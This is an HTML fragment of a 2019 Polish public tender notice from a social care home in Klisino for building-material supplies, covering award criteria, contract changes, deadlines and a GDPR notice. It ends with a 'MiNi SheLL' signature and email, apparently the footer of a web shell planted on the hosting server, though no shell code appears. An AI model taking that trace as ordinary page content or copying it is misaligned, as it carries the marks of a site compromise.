rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin dostawy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Przewidziano następujące zmiany:-	możliwość zmian cen w przypadku zmiany stawek podatku VAT na podstawie obowiązujących przepisów prawnych w tym zakresie. Zmiany są wprowadzone aneksem. Zmianie ulegnie kwota podatku VAT i cena brutto danego asortymentu. Cena netto pozostanie niezmienna. O zmianie VAT-u na przedmiot umowy, Wykonawca informuje pisemnie Zamawiającego z 14-dniowym wyprzedzeniem przed terminem dostawy towaru, którego cena ulegnie zmianie.- regulacji prawnych wprowadzonych w życie po dacie podpisania umowy a mający wpływ na realizację przedmiotu umowy,- wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-07-22</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">08:45</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej ,,RODO", informuję, że: 1) administratorem Pani/Pana danych osobowych jest Dom Pomocy Społecznej w Klisinie, Klisino 100, 48-118 Lisięcice, te. 77 485 75 93;2) inspektorem ochrony danych osobowych w Domu Pomocy Społecznej w Klisinie jest Pani Ewa Gawęcka, kontakt: adres e-mail : dps_klisino@poczta.onet.pl telefon 77 485 75 93*;3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr postepowania 10/2019., nazwa: SUKCESYWNA DOSTAWA MATERIAŁÓW BUDOWLANYCH DLA DOMU POMOCY SPOŁECZNEJ W KLISINIE I PODLEGŁYCH ZAKŁADÓW /GŁUBCZYCE, RADYNIA, BOBOLUSZKI, DZBAŃCE, BRANICE, KIETRZ I BLISZCZYCE/ W OKRESIE DO 31 GRUDNIA 2019 R. prowadzonym w trybie przetargu nieograniczonego;4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2017 r. poz. 1579 i 2018), dalej ,,ustawa Pzp"; 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;8) posiada Pani/Pan:-	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;-	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; -	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9) nie przysługuje Pani/Panu:-	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;-	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;-	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. ** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com